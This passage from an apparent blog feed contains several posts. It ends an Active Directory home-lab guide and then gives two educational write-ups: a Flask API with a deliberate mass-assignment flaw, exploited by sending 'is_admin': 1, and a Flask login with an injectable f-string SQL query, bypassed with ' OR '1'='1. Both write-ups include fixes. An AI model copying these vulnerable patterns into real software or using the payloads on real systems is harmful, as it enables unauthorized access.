&gt; New Interface &gt; Internal Adapter &gt; Public (outbound) &gt; Private (inbound from clients).</p> <p>Now clients can surf via DC proxy. Test later from client: <code>ping google.com</code>.</p> <p>Pitfall: If NAT fails, ensure Adapter 1 (NAT) is up and RRAS service running (<code>services.msc</code>).</p> <h1> Step 13: Hand Out IPs Like Candy—DHCP </h1> <p>Server Manager &gt; Add roles &gt; DHCP Server.</p> <p>Post-install: Authorize (notification flag &gt; Complete DHCP config &gt; domain admin creds).</p> <p>Tools &gt; DHCP &gt; Right-click IPv4 &gt; New Scope:</p> <ul> <li>Name: "Lab Scope"</li> <li>IP: 172.16.0.100 - 172.16.0.200</li> <li>Subnet: 255.255.255.0</li> <li>Exclude: None yet</li> <li>Lease: Default 8 days</li> <li>Router: 172.16.0.1</li> <li>DNS: 172.16.0.1</li> <li>WINS: Skip</li> <li>Activate: Yes</li> </ul> <p>Right-click scope &gt; Scope Options &gt; 006 DNS Servers: 172.16.0.1. Done. Clients will auto-grab.</p> <h1> Step 14: PowerShell Wizardry—Bulk User Creation </h1> <p>Labs need fodder. Open PowerShell as admin on DC:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Set-ExecutionPolicy</span><span class="w"> </span><span class="nx">Unrestricted</span><span class="w"> </span><span class="nt">-Scope</span><span class="w"> </span><span class="nx">CurrentUser</span><span class="w"> </span></code></pre> </div> <p>Create <code>users.txt</code> via Notepad:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>jdoe,John Doe,IT asmith,Alice Smith,Sales bwilson,Bob Wilson,HR </code></pre> </div> <p>Script it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$users</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Get-Content</span><span class="w"> </span><span class="nx">C:\users.txt</span><span class="w"> </span><span class="kr">foreach</span><span class="w"> </span><span class="p">(</span><span class="nv">$u</span><span class="w"> </span><span class="kr">in</span><span class="w"> </span><span class="nv">$users</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nv">$parts</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$u</span><span class="o">.</span><span class="nf">Split</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span><span class="w"> </span><span class="nv">$sam</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$parts</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="nv">$name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$parts</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="nv">$ou</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$parts</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="n">New-ADUser</span><span class="w"> </span><span class="nt">-SamAccountName</span><span class="w"> </span><span class="nv">$sam</span><span class="w"> </span><span class="nt">-UserPrincipalName</span><span class="w"> </span><span class="s2">"</span><span class="nv">$sam</span><span class="s2">@myfirstdomain.com"</span><span class="w"> </span><span class="nt">-Name</span><span class="w"> </span><span class="nv">$name</span><span class="w"> </span><span class="nt">-GivenName</span><span class="w"> </span><span class="p">(</span><span class="nv">$name</span><span class="o">.</span><span class="nf">Split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)[</span><span class="mi">0</span><span class="p">])</span><span class="w"> </span><span class="nt">-Surname</span><span class="w"> </span><span class="p">(</span><span class="nv">$name</span><span class="o">.</span><span class="nf">Split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)[</span><span class="mi">1</span><span class="p">])</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="s2">"OU=</span><span class="nv">$ou</span><span class="s2">,DC=myfirstdomain,DC=com"</span><span class="w"> </span><span class="nt">-AccountPassword</span><span class="w"> </span><span class="p">(</span><span class="n">ConvertTo-SecureString</span><span class="w"> </span><span class="s2">"P@ssw0rd123"</span><span class="w"> </span><span class="nt">-AsPlainText</span><span class="w"> </span><span class="nt">-Force</span><span class="p">)</span><span class="w"> </span><span class="nt">-Enabled</span><span class="w"> </span><span class="bp">$true</span><span class="w"> </span><span class="nt">-PasswordNeverExpires</span><span class="w"> </span><span class="bp">$true</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Run: <code>./bulkusers.ps1</code>. Instant org chart. Tweak for passwords, emails—go wild.</p> <h1> Step 15: Craft the Client Minion </h1> <p>New VM: "CLIENT01", Windows 10 (64-bit), 2048MB RAM, 40GB disk.</p> <p>Attach Win10 ISO, install Pro edition. During OOBE: "I don't have internet" &gt; Local account: <code>localuser</code> / <code>LocalP@ss!</code>.</p> <p>Post-install: Update via NAT if you want, but skip for speed.</p> <h1> Step 16: Ping Pong—Test the Pipes </h1> <p>On client: CMD &gt; <code>ipconfig /release</code> then <code>/renew</code>. Should snag 172.16.0.x from DHCP.</p> <p><code>ping 172.16.0.1</code> (DC)—success? <code>ping 8.8.8.8</code> (internet via NAT)—double win! <code>nslookup myfirstdomain.com</code> resolves?</p> <p>If DHCP ghosts you: Ensure scope activated, client on Internal Network "LABNET". Firewall? <code>netsh advfirewall set allprofiles state off</code> temporarily.</p> <h1> Step 17: The Sacred Join Ritual </h1> <p>Client: Settings &gt; System &gt; About &gt; Rename this PC &gt; Change &gt; Domain: <code>myfirstdomain.com</code>.</p> <p>Reboot prompt? Creds: <code>MYFIRSTDOMAIN\Administrator</code> / password. Welcome screen: "Welcome to myfirstdomain.com".</p> <p>Pitfall: If it gripes "network path not found", DNS issue—ensure client DNS points to 172.16.0.1 (<code>ipconfig /all</code>).</p> <h1> Step 18: Domain Life—Login &amp; Play </h1> <p>Reboot, login: Other user &gt; <code>MYFIRSTDOMAIN\jdoe</code> / <code>P@ssw0rd123</code>.</p> <p>CMD: <code>whoami</code> shows domain\user. <code>nltest /dsgetdc:myfirstdomain.com</code> confirms DC contact.</p> <p>Now explore: From client, access \DC01\C$ (admin share)—file sharing unlocked.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnub8yzye6rzqvrtlu7m8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnub8yzye6rzqvrtlu7m8.png" alt=" " width="800" height="601"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqwhjsakpplevsx27lru9.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqwhjsakpplevsx27lru9.png" alt=" " width="800" height="601"></a></p> <h1> The Aha Moments That Hooked Me </h1> <p>This lab demystified AD's guts: LDAP queries, NTLM vs. Kerberos, the glory of delegated permissions. I learned DHCP reservations for static-ish clients, DNS scavenging to avoid stale records, and why OUs are GPO gateways.</p> <p>Best lesson? Failure is feature. Misconfigure DHCP? Clients go dark—trace it with Wireshark (install on host, capture on Internal). Locked out? Boot to DSRM, reset via <code>net user</code>.</p> linux cybersecurity beginners showdev Day 17 — I Built a Vulnerable API to Demonstrate a Mass Assignment Attack Hafiz Shamnad Wed, 04 Mar 2026 05:20:00 +0000 https://forem.com/hafiz_shamnad/day-17-i-built-a-vulnerable-api-to-demonstrate-a-mass-assignment-attack-20hc https://forem.com/hafiz_shamnad/day-17-i-built-a-vulnerable-api-to-demonstrate-a-mass-assignment-attack-20hc <p>Some vulnerabilities don’t need sophisticated exploits.<br><br> Sometimes all it takes is a backend that trusts user input a little too much. </p> <p>Today I built a small Flask API to demonstrate a subtle but dangerous issue called Mass Assignment.</p> <h2> The Idea </h2> <p>Modern frameworks make development fast by automatically mapping user input into database objects. For example, when updating a user profile, developers often accept JSON data and apply it directly to the user record. Something like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">user</span><span class="p">.</span><span class="nf">update</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">json</span><span class="p">)</span> </code></pre> </div> <p>Convenient.<br><br> But also dangerous. </p> <p>If the application blindly accepts every field sent by the client, an attacker can modify hidden or sensitive fields that were never meant to be user-controlled. This is where Mass Assignment vulnerabilities appear.</p> <p>Here's a simple diagram illustrating how a mass assignment attack flows—from the client's malicious POST request straight to unintended database updates:</p> <h2> The Lab I Built </h2> <p>To demonstrate the issue, I created a small Flask API with:</p> <ul> <li>User login</li> <li>Profile viewing</li> <li>Profile update endpoint</li> <li>Admin panel</li> </ul> <p>The database stores user information including an internal field:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>is_admin </code></pre> </div> <p>Normal users should never be able to modify this. But in the vulnerable version of the API, the update endpoint trusts the client completely.</p> <p>I used SQLite for simplicity, but the principles apply to any ORM or direct query setup. The app runs on <code>localhost:5000</code>, and I tested it with tools like Postman and curl to simulate requests.</p> <h2> The Vulnerable Endpoint </h2> <p>The problem is here:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">fields</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">is_admin</span><span class="sh">"</span><span class="p">]</span> <span class="k">for</span> <span class="n">field</span> <span class="ow">in</span> <span class="n">fields</span><span class="p">:</span> <span class="k">if</span> <span class="n">field</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span> <span class="n">cur</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">UPDATE users SET </span><span class="si">{</span><span class="n">field</span><span class="si">}</span><span class="s">=? WHERE id=?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">field</span><span class="p">],</span> <span class="n">session</span><span class="p">[</span><span class="sh">"</span><span class="s">user_id</span><span class="sh">"</span><span class="p">]))</span> </code></pre> </div> <p>The server accepts whatever fields appear in the request body. So if a user sends:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>{ "email": "new@email.com", "is_admin": 1 } </code></pre> </div> <p>The application happily updates the admin flag. No authentication bypass. No memory corruption. Just a backend trusting the client.</p> <h2> Exploiting the Vulnerability </h2> <p>First I logged in as a normal user.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>POST /login { "username": "testuser", "password": "password123" } </code></pre> </div> <p>The API returned a session cookie.</p> <p>Next, I attempted to update my profile but included a hidden parameter.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>POST /update_profile { "email": "new@email.com", "is_admin": 1 } </code></pre> </div> <p>The server processed it without validation. Here's a visual walkthrough of a similar exploitation—showing the normal payload vs. the sneaky one that escalates privileges:</p> <p>Finally, I accessed the admin panel.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>GET /admin </code></pre> </div> <p>And the system responded:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Welcome Admin. System secrets unlocked. </code></pre> </div> <p>Privilege escalation achieved. In my tests, this took under 30 seconds from login to admin access.</p> <h2> Why This Happens </h2> <p>Mass Assignment vulnerabilities occur when:</p> <ul> <li>Frameworks automatically bind user input to objects</li> <li>Sensitive fields exist in the model</li> <li>Developers fail to restrict which fields can be updated</li> </ul> <p>It is extremely common in:</p> <ul> <li>REST APIs</li> <li>ORMs (like SQLAlchemy in Python or ActiveRecord in Rails)</li> <li>Auto-binding frameworks (e.g., Spring in Java)</li> <li>JSON request handling</li> </ul> <p>Real-world impacts? Think unauthorized role changes, over-claiming discounts in e-commerce, or even injecting payment details. OWASP lists this under A03:2021 – Injection (broader category), but it's sneaky because it feels like "just an update."</p> <h2> Fixing the Vulnerability </h2> <p>The correct solution is field whitelisting. Instead of accepting every parameter, the server must explicitly define which fields users are allowed to modify.</p> <p>Example secure approach:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">allowed_fields</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">]</span> <span class="k">for</span> <span class="n">field</span> <span class="ow">in</span> <span class="n">allowed_fields</span><span class="p">:</span> <span class="k">if</span> <span class="n">field</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span> <span class="n">cur</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">UPDATE users SET </span><span class="si">{</span><span class="n">field</span><span class="si">}</span><span class="s">=? WHERE id=?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">field</span><span class="p">],</span> <span class="n">session</span><span class="p">[</span><span class="sh">"</span><span class="s">user_id</span><span class="sh">"</span><span class="p">])</span> <span class="p">)</span> </code></pre> </div> <p>Now the system ignores any attempt to modify <code>is_admin</code>. Even if an attacker sends it in the request, the server will discard it.</p> <p>For ORMs, use annotations like <code>@JsonIgnore</code> in Jackson or <code>attr_readonly</code> in SQLAlchemy to enforce this at the model level.</p> <h2> Key Lesson </h2> <p>This vulnerability isn't about complex hacking techniques. It's about trust boundaries. User input should never dictate how internal system fields behave. The backend must always decide what can and cannot be modified.</p> <h2> Results </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4cdlzhvuxj58n8sf6fi2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4cdlzhvuxj58n8sf6fi2.png" alt=" " width="567" height="193"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4eomlc6ww8wf3ic6vl4f.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4eomlc6ww8wf3ic6vl4f.png" alt=" " width="596" height="398"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fis0anqbk8jtk9fqeukfs.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fis0anqbk8jtk9fqeukfs.png" alt=" " width="594" height="230"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7r0c8stgej4jja624ow0.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7r0c8stgej4jja624ow0.png" alt=" " width="613" height="120"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flwjm6ztt7guhbhdn21l4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flwjm6ztt7guhbhdn21l4.png" alt=" " width="593" height="219"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F21vhxrz4nmy5pg0vtumu.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F21vhxrz4nmy5pg0vtumu.png" alt=" " width="614" height="369"></a></p> <h2> Closing Thoughts </h2> <p>This small project reminded me of an important principle: Security flaws often hide in convenience. A feature designed to make development easier can quietly introduce risk if input validation is overlooked. </p> <p>Today’s experiment showed how a single unvalidated parameter can transform a regular user into an administrator. And sometimes, the most dangerous bugs are the ones that look perfectly normal.</p> <p>If you're building APIs, run a quick audit: Scan your update endpoints for whitelisting. Tools like OWASP ZAP or even a simple Burp Suite proxy can spot these fast.</p> api python cybersecurity linux Day 16 — I Bypassed My Own Flask Login (And Fixed It Properly) Hafiz Shamnad Tue, 03 Mar 2026 09:37:02 +0000 https://forem.com/hafiz_shamnad/day-16-i-bypassed-my-own-flask-login-and-fixed-it-properly-5a0j https://forem.com/hafiz_shamnad/day-16-i-bypassed-my-own-flask-login-and-fixed-it-properly-5a0j <p>Today wasn’t about building a new feature. It was about breaking one.</p> <p>I built a small Flask authentication system with:</p> <ul> <li>A login page</li> <li>Session-based authentication</li> <li>A protected dashboard</li> <li>SQLite as the backend</li> <li>A default <code>admin</code> user</li> </ul> <p>It looked clean. It worked perfectly.</p> <p>And it was vulnerable by design.</p> <p>For the frontend UI, I used AI to generate the initial design and layout structure, then integrated it with the backend logic. It helped me move faster and focus more on the security aspect of the project.</p> <p>This was a controlled demonstration of one of the most important web vulnerabilities to understand: <strong>SQL Injection (SQLi).</strong></p> <h2> The Setup </h2> <p>The application used:</p> <ul> <li>Flask for routing and sessions</li> <li>SQLite for data storage</li> <li>A simple users table with username and password fields</li> </ul> <p>When a user submitted the login form, the backend constructed an SQL query dynamically using the values provided in the form.</p> <p>The goal was simple: verify that the username and password exist in the database.</p> <p>The problem was not in Flask.<br> Not in SQLite.<br> Not in sessions.</p> <p>The problem was in how the query was constructed.</p> <h2> Where It Went Wrong </h2> <p>The login logic embedded user input directly into the SQL statement.</p> <p>That means whatever the user typed into the form became part of the SQL query itself.</p> <p>This is where SQL injection lives.</p> <p>When input is inserted directly into an SQL string:</p> <ul> <li>The database cannot distinguish between query structure and user data.</li> <li>Malicious input can alter the logic of the query.</li> <li>Authentication checks can be bypassed.</li> </ul> <p>This is not a theoretical issue.<br> It is a structural flaw.</p> <h2> The Exploit </h2> <p>Instead of entering the correct password, I entered:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>' OR '1'='1 </code></pre> </div> <p>This changed the meaning of the SQL query.</p> <p>Instead of asking:</p> <blockquote> <p>Does this username match this password?</p> </blockquote> <p>It effectively became:</p> <blockquote> <p>Does this username match OR is 1 equal to 1?</p> </blockquote> <p>Since <code>1=1</code> is always true, the WHERE condition evaluated as true.</p> <p>The database returned the admin user.</p> <p>The application set the session.</p> <p>I was redirected to the dashboard.</p> <p>Authentication bypassed.</p> <p>No brute force.<br> No password cracking.<br> No guessing.</p> <p>Just manipulating query logic.</p> <h2> Why This Is Dangerous </h2> <p>In this demo, the impact was limited to login bypass.</p> <p>In a real-world application, SQL injection can allow:</p> <ul> <li>Dumping entire user databases</li> <li>Extracting password hashes</li> <li>Modifying records</li> <li>Deleting tables</li> <li>Escalating privileges</li> <li>Remote code execution in some database configurations</li> </ul> <p>Authentication vulnerabilities are particularly critical because they break the trust boundary of the system.</p> <p>Once an attacker bypasses authentication, everything behind it is exposed.</p> <h2> Root Cause Analysis </h2> <p>The root cause was simple:</p> <p>User input was concatenated into the SQL query string.</p> <p>When SQL queries are built using string formatting, the database parser processes user input as executable SQL syntax.</p> <p>This violates a core secure development principle:</p> <p><strong>Never mix code and user-controlled data.</strong></p> <h2> The Fix </h2> <p>The proper solution is to use <strong>parameterized queries</strong> (prepared statements).</p> <p>With parameterized queries:</p> <ul> <li>The SQL structure is defined first.</li> <li>User input is passed separately.</li> <li>The database treats input strictly as data.</li> <li>Injection payloads lose their power.</li> </ul> <p>After implementing parameterized queries:</p> <ul> <li>The same malicious payload was treated as a plain string.</li> <li>It did not alter query logic.</li> <li>Authentication bypass failed.</li> <li>The system behaved correctly.</li> </ul> <p>No complex security framework was required.</p> <p>Just disciplined query handling.</p> <h2> Lessons Learned </h2> <p>This exercise reinforced several key lessons:</p> <ol> <li>Small shortcuts create major vulnerabilities.</li> <li>Authentication logic must be treated as high-risk code.</li> <li>Secure coding is about patterns, not patches.</li> <li>SQL injection is still relevant in 2026.</li> <li>Parameterized queries should be non-negotiable.</li> </ol> <p>This was not about exploiting a system.</p> <p>It was about understanding how easily insecure patterns creep into even simple applications.</p> <h1> Flask Authentication App – Code Explanation </h1> <p>This application implements a simple session-based login system using Flask and SQLite. It includes:</p> <ul> <li>Database initialization</li> <li>Login handling</li> <li>Session-based dashboard access</li> <li>Logout functionality</li> </ul> <p>Let’s break it down step by step.</p> <h1> 1. Application Setup </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">render_template</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">url_for</span><span class="p">,</span> <span class="n">session</span> <span class="kn">import</span> <span class="n">sqlite3</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">app</span><span class="p">.</span><span class="n">secret_key</span> <span class="o">=</span> <span class="sh">"</span><span class="s">sldc-secret-key</span><span class="sh">"</span> </code></pre> </div> <ul> <li> <code>Flask</code> initializes the web application.</li> <li> <code>render_template</code> renders HTML pages.</li> <li> <code>request</code> handles form input.</li> <li> <code>redirect</code> and <code>url_for</code> manage navigation.</li> <li> <code>session</code> stores authenticated user data.</li> <li> <code>sqlite3</code> connects to the SQLite database.</li> <li> <code>secret_key</code> is required for securely signing session cookies.</li> </ul> <h1> 2. Database Initialization </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">users.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS users ( id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password TEXT ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT COUNT(*) FROM users</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">INSERT INTO users (username, password) VALUES (</span><span class="sh">'</span><span class="s">admin</span><span class="sh">'</span><span class="s">, </span><span class="sh">'</span><span class="s">admin123</span><span class="sh">'</span><span class="s">)</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> </code></pre> </div> <h3> What this does: </h3> <ul> <li>Creates a database file <code>users.db</code> if it does not exist.</li> <li>Creates a <code>users</code> table with <code>id</code>, <code>username</code>, and <code>password</code>.</li> <li>Checks if the table is empty.</li> <li>Inserts a default admin user only once.</li> </ul> <p>This ensures the application is usable immediately after startup.</p> <h1> 3. Login Route (<code>/</code>) </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">login</span><span class="p">():</span> <span class="n">message</span> <span class="o">=</span> <span class="sh">""</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">:</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">]</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">]</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">users.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">query</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE username = </span><span class="sh">'</span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="sh">'</span><span class="s"> AND password = </span><span class="sh">'</span><span class="si">{</span><span class="n">password</span><span class="si">}</span><span class="sh">'"</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="n">query</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">if</span> <span class="n">result</span><span class="p">:</span> <span class="n">session</span><span class="p">[</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="nf">url_for</span><span class="p">(</span><span class="sh">"</span><span class="s">dashboard</span><span class="sh">"</span><span class="p">))</span> <span class="k">else</span><span class="p">:</span> <span class="n">message</span> <span class="o">=</span> <span class="sh">"</span><span class="s">Invalid credentials.</span><span class="sh">"</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">login.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">message</span><span class="o">=</span><span class="n">message</span><span class="p">)</span> </code></pre> </div> <h3> How it works: </h3> <ol> <li>When accessed via GET, it simply renders the login page.</li> <li>When the login form is submitted (POST):</li> </ol> <ul> <li>The username and password are retrieved from the form.</li> <li>A database query checks if a matching record exists.</li> <li> <p>If a match is found:</p> <ul> <li>The username is stored in the session.</li> <li>The user is redirected to <code>/dashboard</code>.</li> </ul> </li> <li> <p>If not:</p> <ul> <li>An error message is displayed.</li> </ul> </li> </ul> <p>The session acts as a lightweight authentication token.</p> <h1> 4. Dashboard Route (<code>/dashboard</code>) </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/dashboard</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">dashboard</span><span class="p">():</span> <span class="k">if</span> <span class="sh">"</span><span class="s">username</span><span class="sh">"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">session</span><span class="p">:</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="nf">url_for</span><span class="p">(</span><span class="sh">"</span><span class="s">login</span><span class="sh">"</span><span class="p">))</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">dashboard.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">username</span><span class="o">=</span><span class="n">session</span><span class="p">[</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">])</span> </code></pre> </div> <h3> What this does: </h3> <ul> <li>Checks if <code>"username"</code> exists in the session.</li> <li>If not, the user is redirected 